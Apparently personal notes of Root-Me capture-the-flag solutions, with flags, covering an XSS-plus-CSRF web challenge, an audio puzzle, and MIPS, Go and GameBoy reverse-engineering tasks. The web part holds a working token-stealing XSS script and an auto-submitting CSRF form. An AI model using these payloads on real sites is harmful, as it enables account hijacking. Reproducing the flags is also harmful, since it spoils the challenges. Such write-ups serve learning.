I decided to start getting habit of taking note after this tragedy happens (Thanks @reznok!!!!)
Again, this is a note so that incase root-me be fucked up again, i can easily got all my flag and solution back, THIS IS NOT A WRITE UP.
First, we must steal the token by using XSS
{% code title="steal_token.js" %}
<iframe id="iframe" src="/web-client/ch23/?action=profile" onload="read()"></iframe>
<script>
function read()
{
document.location = document.getElementById("iframe").contentDocument.forms[0].token.value;
}
</script>{% endcode %}
Second, we create crsf form that get token and submit request
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>
function get(name){
if(name=(new RegExp('[?&]'+encodeURIComponent(name)+'=([^&]*)')).exec(location.search))
document.getElementById("token").value = decodeURIComponent(name[1]);
}
</script>
<form id="csrf" action="http://challenge01.root-me.org/web-client/ch23/?action=profile" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="tuanlinh1" />
<input type="hidden" name="status" value="on" />
<input id="token" name="token" value="" />
<input type="submit" value="Submit request" />
<script>get('token')</script>
<script>document.getElementById("csrf").submit()</script>
</form>
</body>
</html>
Reverse it + Slow it down using Audacity
{% file src=".gitbook/assets/out_flag.mp3" %}
{% code title="flag" %}
3b27641fc5h0
{% endcode %}
This challenge is quite easy but seems like people hate MIPS, so there are not much solves. It's actually the easiest assembly to read/write so far as i knew and tried.
First, program read input from stdin through fgets(), and check to see if input string length is equal 19 or not
If len(input_string) != 19, then it will lead to bad boy, otherwise, it keep running program
Next part is an for loop, where it check to see if ($fp + -0x58 + 4 + i) == 'i' where i from range(8, 17)
Which mean
>>> hex(-0x58+4+8)
'-0x4c'
>>> hex(-0x58+4+9)
'-0x4b'
>>> hex(-0x58+4+10)
'-0x4a'
>>> hex(-0x58+4+11)
'-0x49'
>>> hex(-0x58+4+12)
'-0x48'
>>> hex(-0x58+4+13)
'-0x47'
>>> hex(-0x58+4+14)
'-0x46'
>>> hex(-0x58+4+15)
'-0x45'
>>> hex(-0x58+4+16)
'-0x44'
>>> hex(-0x58+4+17)
'-0x43'
Those memory offset will hold value that equal to "i"
Next is an if statement that check whether an fixed address hold an char it want
Which mean
var_4F = var_50 + 3 = "u"
var_50 = "r"
var_51 = "t"
var_53 = "a"
var_54 = "c"
var_4E = "n"
var_52 = "n"
var_4D = "m"
var_43 = "p"
var_42 = "s"
Now we can build an string from array from -0x54 to -0x42, which is also flag:
cantrunmiiiiiiiiips
Config IDA :
Thanks god this is not stripped binary :
Find main_main() :
First, that's why loop where it xor your input_string with "rootme" than compares with an hardcoded byte array
Debug to find which byte array it compares with :
{% code title="solver.py" %}
ida_chars =[
0x3B, 0x02, 0x23, 0x1B, 0x1B, 0x0C, 0x1C, 0x08, 0x28, 0x1B,
0x21, 0x04, 0x1C, 0x0B
]
key = 'rootme'
out = ""
for i in range(0, len(ida_chars)):
out += chr(ord(key[i%len(key)]) ^ (ida_chars[i]))
print out
print len(out){% endcode %}
{% code title="flag" %}
ImLovingGoLand
{% endcode %}
First thing first
This file is GameBoy ROM file, and there is some interesting strings
For debugging GameBoy ROM, i chose BGB (http://bgb.bircd.org/)
Basically, this is the game where you can move : RIGHT, LEFT, UP, DOWN. And hit enter to check, if you satisfy some requirements, it will print flag.
Let's load it into IDA (IDA > CPU = Zilog Z80 > Press C to force disassemble) :
Since i dont know where to start, so i start with string, trying to find its xref
0x042d = Right
0x0434 = Left
0x043E = Down
0x0444 = Yeah!
0x044C = Flag is
0x0459 = Nope
From 44C, we can find good_boy
From good_boy, trace back, we realize there is 4 check_point :
So it take a value at memory [0x0C0B0] and compare with 0x32 , if equal then jump to next good_boy
Trace from 0x0C0B0, we found :
So, we already know that 0x42D is "RIGHT". Basically these asm lines just print "RIGHT", decrease value at [0x0C0B0] by 1 and do something with value at [0x0C0B4] which i believe is FLAG (looks up at good_boy)
Doing the samething with others check point, we know that, when you press a key :
RIGHT => [0x0C0B0h] - 1
LEFT => [0x0C0B1h] - 1
UP => [0x0C0B2h] - 1
DOWN => [0x0C0B3h] - 1
and then it do something with value at [0x0C0B4] (flag)
Then it check to see if we satisfy all below constraints then print flag
[0x0C0B0h] == 0x32
[0x0C0B1h] == 0x30
[0x0C0B2h] == 0x37
[0x0C0B3h] == 0x38
Now we need to know what's its initial value, time to use bgb to debug :
So initial value is :
[0x0C0B0h] == 0x39
[0x0C0B1h] == 0x39
[0x0C0B2h] == 0x39
[0x0C0B3h] == 0x39
Time to get flag :
{% code title="flag" %}
rom1
{% endcode %}